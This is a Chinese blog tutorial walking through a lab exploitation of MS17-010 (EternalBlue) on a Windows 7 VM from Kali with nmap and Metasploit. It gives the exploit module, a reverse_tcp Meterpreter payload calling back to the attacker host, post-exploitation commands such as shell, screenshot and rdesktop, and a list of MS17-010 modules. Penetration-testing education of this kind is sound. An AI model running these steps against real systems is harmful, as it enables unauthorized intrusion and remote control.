002-MS17-010 永恒之蓝 445端口

基础设施

漏洞名:永恒之蓝 

利用端口:445

软件:VMware17.5.1 

攻击机:kali  192.168.2.128

靶机:win7 192.168.2.6

前提:

两机能互相ping通

内网渗透流程:

1)前期交互

确定目标,与kali同一个局域网的主机

查看网络配置

kali

ifconfig

win7

ipconfig

kali网络配置

win7网络配置

互相ping通

2)情报收集

nmap(上帝之眼)扫描

kali (192.168.2.128)

需要进入root权限,才好操作命令,否则有些命令会有问题

sudo su 

扫描网段内的存活ip和端口开放情况

┌──(root💀kali)-[/home/kali]
└─# nmap -T4 -A -v -Pn 192.168.2.0/24

可以看到,会扫描整个网段的ip,发现445端口可以利用,win7的IP为2.6

也可以看到windows(被攻击机)的系统

3)威胁建模

根据情报收集,发现win7+445,绝配,可以利用ms17-010永恒之蓝的漏洞

4)漏洞分析

进入msfconsole的终端(msf,大多数人会直接说成是美少妇,所以,就这样)

┌──(root💀kali)-[/home/kali]
└─# msfconsole

查找ms17-010渗透攻击模块

msf6 > search ms17-010

利用测试接口探查主机是否存在永恒之蓝漏洞

        可以直接用数字来代表后面的数字,不用打那么多东西

msf6 > use 3

        

查看要配置的参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

        required是要求的意思,有yes就是要写的意思

        

需要配置的参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.6

        win7,被攻击的主机为192.168.2.6,rhost为目标主机,rport是目标主机的端口号,

        再查看一下参数是否配置好了

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

        启动

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

5)渗透攻击

知道有漏洞后,输入use 0进入攻击接口

use 0

再查看一番参数

show options

发现目标主机要设置

、并且因为上面显示没有payload,所以也要配置,把攻击机端口lport也配了吧

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.2.128

set lport 5555

show options

        lport这个没啥大的要求,设置得大点就好,但是也别是8080,8081,21,23这些端口,这些是别的程序要用的

然后,启动

run

这两个都是成功得标志

6)后渗透利用

        攻击

        1.进入对方shell

shell

        2.改变编码方式

C:\Windows\system32>chcp 65001

        3.退出win模式

ctrl+C,然后输入y,回车就OK了

        4.桌面截图

screenshot

        5.查看权限

getuid 

        6.远程登录

        这个不是很推荐,因为你在kaili登上后,win7就会退出来,重新登录进去,所以就会打草惊蛇了,但是,也i写上去吧,注意:登陆win7的账号得是win7已有得账号。

        192.168.2.6是win7的IP地址

rdesktop 192.168.2.6

7)报告

        现在就是形成文档阶段的工作了,告诉客户漏洞利用得地方,漏洞的危害,造成的影响以及修复方法,像这篇的,修复方法就有升级系统或者给系统打补丁。

        好困了,后续如果有补充的话会看看吧,可能也会整理一些metasploit的一些攻击命令!

Metasploit 渗透攻击模块解释


0 auxiliary/admin/smb/ms17_010_command // 扫描 445 在线主机,直接执行命令,需要漏洞主机的用户名和密码参数
1 auxiliary/scanner/smb/smb_ms17_010 // 永恒之蓝扫描模块,扫描某个网段
内是否存在 ms17_010 漏洞
2 exploit/windows/smb/ms17_010_eternalblue // 永恒之蓝漏洞利用/攻击模块3 exploit/windows/smb/smb_doublepulsar_rce //SMB 后 门 , 用 于 利 用
DoublePulsar 漏洞实现 SMB 远程代码执行
4 exploit/windows/smb/ms17_010_psexec //直接利用获得 meterpreter 会话,
需要提供用户名和密码参数

余着了......

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值